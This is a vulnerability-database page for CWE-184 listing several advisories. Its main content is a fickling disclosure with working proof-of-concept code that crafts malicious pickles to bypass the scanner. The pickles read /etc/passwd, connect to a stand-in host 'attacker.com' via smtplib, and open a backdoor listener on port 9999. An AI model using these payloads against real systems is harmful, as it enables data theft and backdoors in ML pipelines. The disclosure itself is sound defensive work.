CWE-184
AllowedIncomplete List of Disallowed Inputs
Abstraction: Base · Status: Draft
The product implements a protection mechanism that relies on a list of inputs (or properties of inputs) that are not allowed by policy or otherwise require other action to neutralize before additional processing takes place, but the list is incomplete.
306 vulnerabilities reference this CWE, most recent first.
GHSA-MHC9-48GJ-9GP3
Vulnerability from github – Published: 2026-02-25 15:24 – Updated: 2026-02-25 15:24Assessment
It is believed that the analysis pass works as intended, REDUCE and BUILD are not at fault here. The few potentially unsafe modules have been added to the blocklist (https://github.com/trailofbits/fickling/commit/0c4558d950daf70e134090573450ddcedaf10400).
Original report
Summary
All 5 of fickling's safety interfaces — is_likely_safe(), check_safety(), CLI --check-safety, always_check_safety(), and the check_safety() context manager — report LIKELY_SAFE / raise no exceptions for pickle files that call dangerous top-level stdlib functions (signal handlers, network servers, network connections, file operations) when the REDUCE opcode is followed by a BUILD opcode. Demonstrated impacts include backdoor network listeners (socketserver.TCPServer), process persistence (signal.signal), outbound data exfiltration (smtplib.SMTP), and file creation on disk (sqlite3.connect). An attacker can append a trivial BUILD opcode to any payload to eliminate all detection.
Details
The bypass exploits three weaknesses in fickling's static analysis pipeline:
-
likely_safe_importsover-inclusion (fickle.py:432-435): When fickling decompiles a pickle and encountersfrom smtplib import SMTP, it adds"SMTP"to thelikely_safe_importsset becausesmtplibis a Python stdlib module. This happens for ALL stdlib modules, including dangerous ones like smtplib, ftplib, sqlite3, etc. -
OvertlyBadEvalsexemption (analysis.py:301-310): The main call-level safety checker skips any call where the function name is inlikely_safe_imports. SoSMTP('attacker.com')is never flagged. -
__setstate__exclusion (fickle.py:443-446): BUILD generates a__setstate__call which is excluded from thenon_setstate_callslist. This means BUILD's call is invisible toOvertlyBadEvals. Additionally, BUILD consumes the REDUCE result variable, which prevents theUnusedVariableschecker from flagging the unused assignment (the only remaining detection mechanism).
Affected versions
All versions through 0.1.7 (latest as of 2026-02-18).
Affected APIs
fickling.is_likely_safe()- returnsTruefor bypass payloadsfickling.analysis.check_safety()- returnsAnalysisResultswithseverity = Severity.LIKELY_SAFEfickling --check-safetyCLI - exits with code 0fickling.always_check_safety()+pickle.load()- noUnsafeFileErrorraised, malicious code executesfickling.check_safety()context manager +pickle.load()- noUnsafeFileErrorraised, malicious code executes
PoC
A single pickle that reads /etc/passwd AND opens a network connection to an attacker's server, yet fickling reports it as LIKELY_SAFE:
import io, struct, tempfile, os
def sbu(s):
"""SHORT_BINUNICODE opcode helper."""
b = s.encode()
return b"\x8c" + struct.pack("<B", len(b)) + b
def make_exfiltration_pickle():
"""
Single pickle that:
1. Reads /etc/passwd via fileinput.input()
2. Opens TCP connection to attacker via smtplib.SMTP()
Both operations pass as LIKELY_SAFE.
"""
buf = io.BytesIO()
buf.write(b"\x80\x04\x95") # PROTO 4 + FRAME
payload = io.BytesIO()
# --- Operation 1: Read /etc/passwd ---
payload.write(sbu("fileinput") + sbu("input") + b"\x93") # STACK_GLOBAL
payload.write(sbu("/etc/passwd") + b"\x85") # arg + TUPLE1
payload.write(b"R") # REDUCE
payload.write(b"}" + sbu("_x") + sbu("y") + b"s" + b"b") # BUILD
payload.write(b"0") # POP (discard result)
# --- Operation 2: Connect to attacker ---
payload.write(sbu("smtplib") + sbu("SMTP") + b"\x93") # STACK_GLOBAL
payload.write(sbu("attacker.com") + b"\x85") # arg + TUPLE1
payload.write(b"R") # REDUCE
payload.write(b"}" + sbu("_x") + sbu("y") + b"s" + b"b") # BUILD
payload.write(b".") # STOP
frame_data = payload.getvalue()
buf.write(struct.pack("<Q", len(frame_data)))
buf.write(frame_data)
return buf.getvalue()
# Generate and test
data = make_exfiltration_pickle()
with open("/tmp/exfil.pkl", "wb") as f:
f.write(data)
import fickling
print(fickling.is_likely_safe("/tmp/exfil.pkl"))
# Output: True <-- BYPASSED (file read + network connection in one pickle)
fickling decompiles this to:
from fileinput import input
_var0 = input('/etc/passwd') # reads /etc/passwd
_var1 = _var0
_var1.__setstate__({'_x': 'y'})
from smtplib import SMTP
_var2 = SMTP('attacker.com') # opens TCP connection to attacker
_var3 = _var2
_var3.__setstate__({'_x': 'y'})
result = _var3
Yet reports LIKELY_SAFE because every call is either in likely_safe_imports (skipped) or is __setstate__ (excluded).
CLI verification:
$ fickling --check-safety /tmp/exfil.pkl; echo "EXIT: $?"
EXIT: 0 # BYPASSED - file read + network access passes as safe
always_check_safety() verification:
import fickling, pickle
fickling.always_check_safety()
# This should raise UnsafeFileError for malicious pickles, but doesn't:
with open("/tmp/exfil.pkl", "rb") as f:
result = pickle.load(f)
# No exception raised — malicious code executed successfully
check_safety() context manager verification:
import fickling, pickle
with fickling.check_safety():
with open("/tmp/exfil.pkl", "rb") as f:
result = pickle.load(f)
# No exception raised — malicious code executed successfully
Backdoor listener PoC (most impactful)
A pickle that opens a TCP listener on port 9999, binding to all interfaces:
import io, struct
def sbu(s):
b = s.encode()
return b"\x8c" + struct.pack("<B", len(b)) + b
def make_backdoor_listener():
buf = io.BytesIO()
buf.write(b"\x80\x04\x95") # PROTO 4 + FRAME
payload = io.BytesIO()
# socketserver.TCPServer via STACK_GLOBAL
payload.write(sbu("socketserver") + sbu("TCPServer") + b"\x93")
# Address tuple ('0.0.0.0', 9999) - needs MARK+TUPLE for mixed types
payload.write(b"(") # MARK
payload.write(sbu("0.0.0.0")) # host string
payload.write(b"J" + struct.pack("<i", 9999)) # BININT port
payload.write(b"t") # TUPLE
# Handler class via STACK_GLOBAL
payload.write(sbu("socketserver") + sbu("BaseRequestHandler") + b"\x93")
payload.write(b"\x86") # TUPLE2 -> (address, handler)
payload.write(b"R") # REDUCE -> TCPServer(address, handler)
payload.write(b"N") # NONE
payload.write(b"b") # BUILD(None) -> no-op
payload.write(b".") # STOP
frame_data = payload.getvalue()
buf.write(struct.pack("<Q", len(frame_data)))
buf.write(frame_data)
return buf.getvalue()
import fickling, pickle, socket
data = make_backdoor_listener()
with open("/tmp/backdoor.pkl", "wb") as f:
f.write(data)
print(fickling.is_likely_safe("/tmp/backdoor.pkl"))
# Output: True <-- BYPASSED
server = pickle.loads(data)
# Port 9999 is now LISTENING on all interfaces
s = socket.socket()
s.connect(("127.0.0.1", 9999))
print("Connected to backdoor port!") # succeeds
s.close()
server.server_close()
The TCPServer constructor calls server_bind() and server_activate() (which calls listen()), so the port is open and accepting connections immediately after pickle.loads() returns.
Impact
An attacker can distribute a malicious pickle file (e.g., a backdoored ML model) that passes all fickling safety checks. Demonstrated impacts include:
- Backdoor network listener:
socketserver.TCPServer(('0.0.0.0', 9999), BaseRequestHandler)opens a port on all interfaces, accepting connections from the network. The TCPServer constructor callsserver_bind()andserver_activate(), so the port is open immediately afterpickle.loads()returns. - Process persistence:
signal.signal(SIGTERM, SIG_IGN)makes the process ignore SIGTERM. In Kubernetes/Docker/ECS, the orchestrator cannot gracefully shut down the process — the backdoor stays alive for 30+ seconds per restart attempt. - Outbound exfiltration channels:
smtplib.SMTP('attacker.com'),ftplib.FTP('attacker.com'),imaplib.IMAP4('attacker.com'),poplib.POP3('attacker.com')open outbound TCP connections. The attacker's server sees the connection and learns the victim's IP and hostname. - File creation on disk:
sqlite3.connect(path)creates a file at an attacker-chosen path as a side effect of the constructor. - Additional bypassed modules: glob.glob, fileinput.input, pathlib.Path, compileall.compile_file, codeop.compile_command, logging.getLogger, zipimport.zipimporter, threading.Thread
A single pickle can combine all of the above (signal suppression + backdoor listener + network callback + file creation) into one payload. In a cloud ML environment, this enables persistent backdoor access while resisting graceful shutdown. 15 top-level stdlib modules bypass detection when BUILD is appended.
This affects any application using fickling as a safety gate for ML model files.
Suggested Fix
Restrict likely_safe_imports to a curated allowlist of known-safe modules instead of trusting all stdlib modules. Additionally, either remove the OvertlyBadEvals exemption for likely_safe_imports or expand the UNSAFE_IMPORTS blocklist to cover network/file/compilation modules.
Relationship to GHSA-83pf-v6qq-pwmr
GHSA-83pf-v6qq-pwmr (Low, 2026-02-19) reports 6 network-protocol modules missing from the blocklist. Adding those modules to UNSAFE_IMPORTS does NOT fix this vulnerability because the root cause is the OvertlyBadEvals exemption for likely_safe_imports (analysis.py:304-310), which skips calls to ANY stdlib function — not just those 6 modules. Our 15 tested bypass modules include socketserver, signal, sqlite3, threading, compileall, and others beyond the scope of that advisory.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 0.1.7"
},
"package": {
"ecosystem": "PyPI",
"name": "fickling"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.1.8"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-184"
],
"github_reviewed": true,
"github_reviewed_at": "2026-02-25T15:24:18Z",
"nvd_published_at": null,
"severity": "MODERATE"
},
"details": "# Assessment\n\nIt is believed that the analysis pass works as intended, `REDUCE` and `BUILD` are not at fault here. The few potentially unsafe modules have been added to the blocklist (https://github.com/trailofbits/fickling/commit/0c4558d950daf70e134090573450ddcedaf10400).\n\n# Original report\n\n### Summary\nAll 5 of fickling\u0027s safety interfaces \u2014 `is_likely_safe()`, `check_safety()`, CLI `--check-safety`, `always_check_safety()`, and the `check_safety()` context manager \u2014 report `LIKELY_SAFE` / raise no exceptions for pickle files that call dangerous top-level stdlib functions (signal handlers, network servers, network connections, file operations) when the REDUCE opcode is followed by a BUILD opcode. Demonstrated impacts include backdoor network listeners (`socketserver.TCPServer`), process persistence (`signal.signal`), outbound data exfiltration (`smtplib.SMTP`), and file creation on disk (`sqlite3.connect`). An attacker can append a trivial BUILD opcode to any payload to eliminate all detection.\n\n## Details\n\nThe bypass exploits three weaknesses in fickling\u0027s static analysis pipeline:\n\n1. **`likely_safe_imports` over-inclusion** (`fickle.py:432-435`): When fickling decompiles a pickle and encounters `from smtplib import SMTP`, it adds `\"SMTP\"` to the `likely_safe_imports` set because `smtplib` is a Python stdlib module. This happens for ALL stdlib modules, including dangerous ones like smtplib, ftplib, sqlite3, etc.\n\n2. **`OvertlyBadEvals` exemption** (`analysis.py:301-310`): The main call-level safety checker skips any call where the function name is in `likely_safe_imports`. So `SMTP(\u0027attacker.com\u0027)` is never flagged.\n\n3. **`__setstate__` exclusion** (`fickle.py:443-446`): BUILD generates a `__setstate__` call which is excluded from the `non_setstate_calls` list. This means BUILD\u0027s call is invisible to `OvertlyBadEvals`. Additionally, BUILD consumes the REDUCE result variable, which prevents the `UnusedVariables` checker from flagging the unused assignment (the only remaining detection mechanism).\n\n### Affected versions\n\nAll versions through 0.1.7 (latest as of 2026-02-18).\n\n### Affected APIs\n\n- `fickling.is_likely_safe()` - returns `True` for bypass payloads\n- `fickling.analysis.check_safety()` - returns `AnalysisResults` with `severity = Severity.LIKELY_SAFE`\n- `fickling --check-safety` CLI - exits with code 0\n- `fickling.always_check_safety()` + `pickle.load()` - no `UnsafeFileError` raised, malicious code executes\n- `fickling.check_safety()` context manager + `pickle.load()` - no `UnsafeFileError` raised, malicious code executes\n\n\n\n## PoC\n\nA single pickle that reads `/etc/passwd` AND opens a network connection to an attacker\u0027s server, yet fickling reports it as `LIKELY_SAFE`:\n\n```python\nimport io, struct, tempfile, os\n\ndef sbu(s):\n \"\"\"SHORT_BINUNICODE opcode helper.\"\"\"\n b = s.encode()\n return b\"\\x8c\" + struct.pack(\"\u003cB\", len(b)) + b\n\ndef make_exfiltration_pickle():\n \"\"\"\n Single pickle that:\n 1. Reads /etc/passwd via fileinput.input()\n 2. Opens TCP connection to attacker via smtplib.SMTP()\n Both operations pass as LIKELY_SAFE.\n \"\"\"\n buf = io.BytesIO()\n buf.write(b\"\\x80\\x04\\x95\") # PROTO 4 + FRAME\n payload = io.BytesIO()\n\n # --- Operation 1: Read /etc/passwd ---\n payload.write(sbu(\"fileinput\") + sbu(\"input\") + b\"\\x93\") # STACK_GLOBAL\n payload.write(sbu(\"/etc/passwd\") + b\"\\x85\") # arg + TUPLE1\n payload.write(b\"R\") # REDUCE\n payload.write(b\"}\" + sbu(\"_x\") + sbu(\"y\") + b\"s\" + b\"b\") # BUILD\n payload.write(b\"0\") # POP (discard result)\n\n # --- Operation 2: Connect to attacker ---\n payload.write(sbu(\"smtplib\") + sbu(\"SMTP\") + b\"\\x93\") # STACK_GLOBAL\n payload.write(sbu(\"attacker.com\") + b\"\\x85\") # arg + TUPLE1\n payload.write(b\"R\") # REDUCE\n payload.write(b\"}\" + sbu(\"_x\") + sbu(\"y\") + b\"s\" + b\"b\") # BUILD\n payload.write(b\".\") # STOP\n\n frame_data = payload.getvalue()\n buf.write(struct.pack(\"\u003cQ\", len(frame_data)))\n buf.write(frame_data)\n return buf.getvalue()\n\n# Generate and test\ndata = make_exfiltration_pickle()\nwith open(\"/tmp/exfil.pkl\", \"wb\") as f:\n f.write(data)\n\nimport fickling\nprint(fickling.is_likely_safe(\"/tmp/exfil.pkl\"))\n# Output: True \u003c-- BYPASSED (file read + network connection in one pickle)\n```\n\nfickling decompiles this to:\n```python\nfrom fileinput import input\n_var0 = input(\u0027/etc/passwd\u0027) # reads /etc/passwd\n_var1 = _var0\n_var1.__setstate__({\u0027_x\u0027: \u0027y\u0027})\nfrom smtplib import SMTP\n_var2 = SMTP(\u0027attacker.com\u0027) # opens TCP connection to attacker\n_var3 = _var2\n_var3.__setstate__({\u0027_x\u0027: \u0027y\u0027})\nresult = _var3\n```\n\nYet reports `LIKELY_SAFE` because every call is either in `likely_safe_imports` (skipped) or is `__setstate__` (excluded).\n\n**CLI verification:**\n```bash\n$ fickling --check-safety /tmp/exfil.pkl; echo \"EXIT: $?\"\nEXIT: 0 # BYPASSED - file read + network access passes as safe\n```\n\n**`always_check_safety()` verification:**\n```python\nimport fickling, pickle\n\nfickling.always_check_safety()\n\n# This should raise UnsafeFileError for malicious pickles, but doesn\u0027t:\nwith open(\"/tmp/exfil.pkl\", \"rb\") as f:\n result = pickle.load(f)\n# No exception raised \u2014 malicious code executed successfully\n```\n\n**`check_safety()` context manager verification:**\n```python\nimport fickling, pickle\n\nwith fickling.check_safety():\n with open(\"/tmp/exfil.pkl\", \"rb\") as f:\n result = pickle.load(f)\n# No exception raised \u2014 malicious code executed successfully\n```\n\n### Backdoor listener PoC (most impactful)\n\nA pickle that opens a TCP listener on port 9999, binding to all interfaces:\n\n```python\nimport io, struct\n\ndef sbu(s):\n b = s.encode()\n return b\"\\x8c\" + struct.pack(\"\u003cB\", len(b)) + b\n\ndef make_backdoor_listener():\n buf = io.BytesIO()\n buf.write(b\"\\x80\\x04\\x95\") # PROTO 4 + FRAME\n payload = io.BytesIO()\n\n # socketserver.TCPServer via STACK_GLOBAL\n payload.write(sbu(\"socketserver\") + sbu(\"TCPServer\") + b\"\\x93\")\n\n # Address tuple (\u00270.0.0.0\u0027, 9999) - needs MARK+TUPLE for mixed types\n payload.write(b\"(\") # MARK\n payload.write(sbu(\"0.0.0.0\")) # host string\n payload.write(b\"J\" + struct.pack(\"\u003ci\", 9999)) # BININT port\n payload.write(b\"t\") # TUPLE\n\n # Handler class via STACK_GLOBAL\n payload.write(sbu(\"socketserver\") + sbu(\"BaseRequestHandler\") + b\"\\x93\")\n\n payload.write(b\"\\x86\") # TUPLE2 -\u003e (address, handler)\n payload.write(b\"R\") # REDUCE -\u003e TCPServer(address, handler)\n payload.write(b\"N\") # NONE\n payload.write(b\"b\") # BUILD(None) -\u003e no-op\n payload.write(b\".\") # STOP\n\n frame_data = payload.getvalue()\n buf.write(struct.pack(\"\u003cQ\", len(frame_data)))\n buf.write(frame_data)\n return buf.getvalue()\n\nimport fickling, pickle, socket\ndata = make_backdoor_listener()\nwith open(\"/tmp/backdoor.pkl\", \"wb\") as f:\n f.write(data)\n\nprint(fickling.is_likely_safe(\"/tmp/backdoor.pkl\"))\n# Output: True \u003c-- BYPASSED\n\nserver = pickle.loads(data)\n# Port 9999 is now LISTENING on all interfaces\n\ns = socket.socket()\ns.connect((\"127.0.0.1\", 9999))\nprint(\"Connected to backdoor port!\") # succeeds\ns.close()\nserver.server_close()\n```\n\nThe TCPServer constructor calls `server_bind()` and `server_activate()` (which calls `listen()`), so the port is open and accepting connections immediately after `pickle.loads()` returns.\n\n## Impact\n\nAn attacker can distribute a malicious pickle file (e.g., a backdoored ML model) that passes all fickling safety checks. Demonstrated impacts include:\n\n- **Backdoor network listener**: `socketserver.TCPServer((\u00270.0.0.0\u0027, 9999), BaseRequestHandler)` opens a port on all interfaces, accepting connections from the network. The TCPServer constructor calls `server_bind()` and `server_activate()`, so the port is open immediately after `pickle.loads()` returns.\n- **Process persistence**: `signal.signal(SIGTERM, SIG_IGN)` makes the process ignore SIGTERM. In Kubernetes/Docker/ECS, the orchestrator cannot gracefully shut down the process \u2014 the backdoor stays alive for 30+ seconds per restart attempt.\n- **Outbound exfiltration channels**: `smtplib.SMTP(\u0027attacker.com\u0027)`, `ftplib.FTP(\u0027attacker.com\u0027)`, `imaplib.IMAP4(\u0027attacker.com\u0027)`, `poplib.POP3(\u0027attacker.com\u0027)` open outbound TCP connections. The attacker\u0027s server sees the connection and learns the victim\u0027s IP and hostname.\n- **File creation on disk**: `sqlite3.connect(path)` creates a file at an attacker-chosen path as a side effect of the constructor.\n- **Additional bypassed modules**: glob.glob, fileinput.input, pathlib.Path, compileall.compile_file, codeop.compile_command, logging.getLogger, zipimport.zipimporter, threading.Thread\n\nA single pickle can combine all of the above (signal suppression + backdoor listener + network callback + file creation) into one payload. In a cloud ML environment, this enables persistent backdoor access while resisting graceful shutdown. 15 top-level stdlib modules bypass detection when BUILD is appended.\n\nThis affects any application using fickling as a safety gate for ML model files.\n\n## Suggested Fix\n\nRestrict `likely_safe_imports` to a curated allowlist of known-safe modules instead of trusting all stdlib modules. Additionally, either remove the `OvertlyBadEvals` exemption for `likely_safe_imports` or expand the `UNSAFE_IMPORTS` blocklist to cover network/file/compilation modules.\n\n## Relationship to GHSA-83pf-v6qq-pwmr\n\nGHSA-83pf-v6qq-pwmr (Low, 2026-02-19) reports 6 network-protocol modules missing from the blocklist. Adding those modules to `UNSAFE_IMPORTS` does NOT fix this vulnerability because the root cause is the `OvertlyBadEvals` exemption for `likely_safe_imports` (`analysis.py:304-310`), which skips calls to ANY stdlib function \u2014 not just those 6 modules. Our 15 tested bypass modules include `socketserver`, `signal`, `sqlite3`, `threading`, `compileall`, and others beyond the scope of that advisory.",
"id": "GHSA-mhc9-48gj-9gp3",
"modified": "2026-02-25T15:24:18Z",
"published": "2026-02-25T15:24:18Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/trailofbits/fickling/security/advisories/GHSA-mhc9-48gj-9gp3"
},
{
"type": "WEB",
"url": "https://github.com/trailofbits/fickling/commit/0c4558d950daf70e134090573450ddcedaf10400"
},
{
"type": "ADVISORY",
"url": "https://github.com/advisories/GHSA-83pf-v6qq-pwmr"
},
{
"type": "PACKAGE",
"url": "https://github.com/trailofbits/fickling"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Fickling has safety check bypass via REDUCE+BUILD opcode sequence"
}
GHSA-MHGJ-JXXF-GXJ9
Vulnerability from github – Published: 2026-05-28 15:39 – Updated: 2026-05-28 15:39Roundcube's HTML sanitization path for message rendering allows loopback, localhost, RFC1918, link-local, and ULA URLs even when remote content loading is disabled. A remote attacker can send an HTML email that causes the victim's browser to issue requests to local or private-network services simply by opening the message preview.
{
"affected": [],
"aliases": [
"CVE-2026-9818"
],
"database_specific": {
"cwe_ids": [
"CWE-184"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-05-28T13:16:25Z",
"severity": "MODERATE"
},
"details": "Roundcube\u0027s HTML sanitization path for message rendering allows loopback, localhost, RFC1918, link-local, and ULA URLs even when remote content loading is disabled. A remote attacker can send an HTML email that causes the victim\u0027s browser to issue requests to local or private-network services simply by opening the message preview.",
"id": "GHSA-mhgj-jxxf-gxj9",
"modified": "2026-05-28T15:39:50Z",
"published": "2026-05-28T15:39:50Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-9818"
},
{
"type": "WEB",
"url": "https://github.com/roundcube/roundcubemail/commit/7b52353653a67e6073b97d70eb94047132b78556"
},
{
"type": "WEB",
"url": "https://github.com/roundcube/roundcubemail/commit/faf867432f51ebbe100382a70a9e3c042415ee1b"
},
{
"type": "WEB",
"url": "https://advisories.orangecyberdefense.com/advisories/163"
},
{
"type": "WEB",
"url": "https://github.com/roundcube/roundcubemail/releases/tag/1.6.16"
},
{
"type": "WEB",
"url": "https://github.com/roundcube/roundcubemail/releases/tag/1.7.1"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-MR6F-H57V-RPJ5
Vulnerability from github – Published: 2025-12-10 21:35 – Updated: 2025-12-11 15:51Description
An input-validation flaw in the returnTo parameter in the Auth0 Next.js SDK could allow attackers to inject unintended OAuth query parameters into the Auth0 authorization request. Successful exploitation may result in tokens being issued with unintended parameters
Am I Affected?
You are affected if you meet the following preconditions: - Applications using the auth0/nextjs-auth0 SDK version prior to 4.13.0
Affected product and versions
Auth0/nextjs-auth0 versions >= 4.9.0 and < 4.13.0
Resolution
Upgrade Auth0/nextjs-auth0 version to v4.13.0
Acknowledgements
Okta would like to thank Joshua Rogers (MegaManSec) for their discovery and responsible disclosure.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "@auth0/nextjs-auth0"
},
"ranges": [
{
"events": [
{
"introduced": "4.9.0"
},
{
"fixed": "4.13.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-67716"
],
"database_specific": {
"cwe_ids": [
"CWE-184"
],
"github_reviewed": true,
"github_reviewed_at": "2025-12-10T21:35:58Z",
"nvd_published_at": "2025-12-11T01:16:00Z",
"severity": "LOW"
},
"details": "### Description\nAn input-validation flaw in the returnTo parameter in the Auth0 Next.js SDK could allow attackers to inject unintended OAuth query parameters into the Auth0 authorization request. Successful exploitation may result in tokens being issued with unintended parameters\n\n### Am I Affected?\nYou are affected if you meet the following preconditions:\n- Applications using the auth0/nextjs-auth0 SDK version prior to 4.13.0\n\n### Affected product and versions\nAuth0/nextjs-auth0 versions \u003e= 4.9.0 and \u003c 4.13.0\n\n\n### Resolution\nUpgrade Auth0/nextjs-auth0 version to v4.13.0\n\n### Acknowledgements\nOkta would like to thank Joshua Rogers (MegaManSec) for their discovery and responsible disclosure.",
"id": "GHSA-mr6f-h57v-rpj5",
"modified": "2025-12-11T15:51:53Z",
"published": "2025-12-10T21:35:58Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/auth0/nextjs-auth0/security/advisories/GHSA-mr6f-h57v-rpj5"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-67716"
},
{
"type": "WEB",
"url": "https://github.com/auth0/nextjs-auth0/commit/35eb321de3345ccf23e8c0d6f66c9f2f2f57d26c"
},
{
"type": "PACKAGE",
"url": "https://github.com/auth0/nextjs-auth0"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "Improper Validation of Query Parameters in Auth0 Next.js SDK"
}
GHSA-MRFV-M5WM-5W6W
Vulnerability from github – Published: 2025-12-31 06:30 – Updated: 2026-01-07 18:30libsodium before ad3004e, in atypical use cases involving certain custom cryptography or untrusted data to crypto_core_ed25519_is_valid_point, mishandles checks for whether an elliptic curve point is valid because it sometimes allows points that aren't in the main cryptographic group.
This advisoory lists packages in the GitHub Advisory Database's supported ecosystems that are affected by this vulnerability due to a vulnerable dependency.
{
"affected": [
{
"package": {
"ecosystem": "Packagist",
"name": "paragonie/sodium_compat"
},
"ranges": [
{
"events": [
{
"introduced": "2"
},
{
"fixed": "2.5.0"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Packagist",
"name": "paragonie/sodium_compat"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.24.0"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "PyNaCl"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.6.2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "hdwallet"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.6.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-69277"
],
"database_specific": {
"cwe_ids": [
"CWE-184"
],
"github_reviewed": true,
"github_reviewed_at": "2026-01-06T17:12:24Z",
"nvd_published_at": "2025-12-31T06:15:41Z",
"severity": "MODERATE"
},
"details": "libsodium before ad3004e, in atypical use cases involving certain custom cryptography or untrusted data to crypto_core_ed25519_is_valid_point, mishandles checks for whether an elliptic curve point is valid because it sometimes allows points that aren\u0027t in the main cryptographic group.\n\nThis advisoory lists packages in the GitHub Advisory Database\u0027s [supported ecosystems](https://github.com/github/advisory-database?tab=readme-ov-file#supported-ecosystems) that are affected by this vulnerability due to a vulnerable dependency.",
"id": "GHSA-mrfv-m5wm-5w6w",
"modified": "2026-01-07T18:30:24Z",
"published": "2025-12-31T06:30:18Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69277"
},
{
"type": "WEB",
"url": "https://github.com/pyca/pynacl/issues/920"
},
{
"type": "WEB",
"url": "https://github.com/hdwallet-io/python-hdwallet/pull/124"
},
{
"type": "WEB",
"url": "https://github.com/jedisct1/libsodium/commit/ad3004ec8731730e93fcfbbc824e67eadc1c1bae"
},
{
"type": "WEB",
"url": "https://github.com/paragonie/sodium_compat/commit/2cb48f26130919f92f30650bdcc30e6f4ebe45ac"
},
{
"type": "WEB",
"url": "https://github.com/paragonie/sodium_compat/commit/4714da6efdc782c06690bc72ce34fae7941c2d9f"
},
{
"type": "WEB",
"url": "https://github.com/pyca/pynacl/commit/96314884d88d1089ff5f336dba61d7abbcddbbf7"
},
{
"type": "WEB",
"url": "https://github.com/pyca/pynacl/commit/ecf41f55a3d8f1e10ce89c61c4b4d67f3f4467cf"
},
{
"type": "WEB",
"url": "https://00f.net/2025/12/30/libsodium-vulnerability"
},
{
"type": "WEB",
"url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/paragonie/sodium_compat/2025-12-30.yaml"
},
{
"type": "PACKAGE",
"url": "https://github.com/paragonie/sodium_compat"
},
{
"type": "WEB",
"url": "https://ianix.com/pub/ed25519-deployment.html"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2026/01/msg00004.html"
},
{
"type": "WEB",
"url": "https://news.ycombinator.com/item?id=46435614"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "libsodium has Incomplete List of Disallowed Inputs"
}
GHSA-MW7V-RXQG-F85M
Vulnerability from github – Published: 2026-05-06 21:31 – Updated: 2026-05-06 21:31OpenClaw versions 2026.3.31 before 2026.4.10 contain a privilege escalation vulnerability where heartbeat owner downgrade detection misses local background async exec completion events. Attackers can exploit this by providing untrusted completion content to leave a run in a more privileged context than intended.
{
"affected": [],
"aliases": [
"CVE-2026-43578"
],
"database_specific": {
"cwe_ids": [
"CWE-184"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-05-06T20:16:33Z",
"severity": "CRITICAL"
},
"details": "OpenClaw versions 2026.3.31 before 2026.4.10 contain a privilege escalation vulnerability where heartbeat owner downgrade detection misses local background async exec completion events. Attackers can exploit this by providing untrusted completion content to leave a run in a more privileged context than intended.",
"id": "GHSA-mw7v-rxqg-f85m",
"modified": "2026-05-06T21:31:42Z",
"published": "2026-05-06T21:31:42Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-g375-h3v6-4873"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-43578"
},
{
"type": "WEB",
"url": "https://github.com/openclaw/openclaw/commit/19a2e9ddb5a8a494abcba812bb11f51075026a27"
},
{
"type": "WEB",
"url": "https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-missed-async-exec-completion-events-in-heartbeat-owner-downgrade"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-P4WH-CR8M-GM6C
Vulnerability from github – Published: 2026-03-03 21:36 – Updated: 2026-06-08 23:24Summary
shell-env fallback trusted prefix-based executable paths for $SHELL, allowing execution of attacker-controlled binaries in local/runtime-env influence scenarios.
Details
In affected versions, shell selection accepted either:
1. a shell listed in /etc/shells, or
2. any executable under hardcoded trusted prefixes (/bin, /usr/bin, /usr/local/bin, /opt/homebrew/bin, /run/current-system/sw/bin).
The selected shell was then executed as a login shell (-l -c 'env -0') for PATH/environment probing.
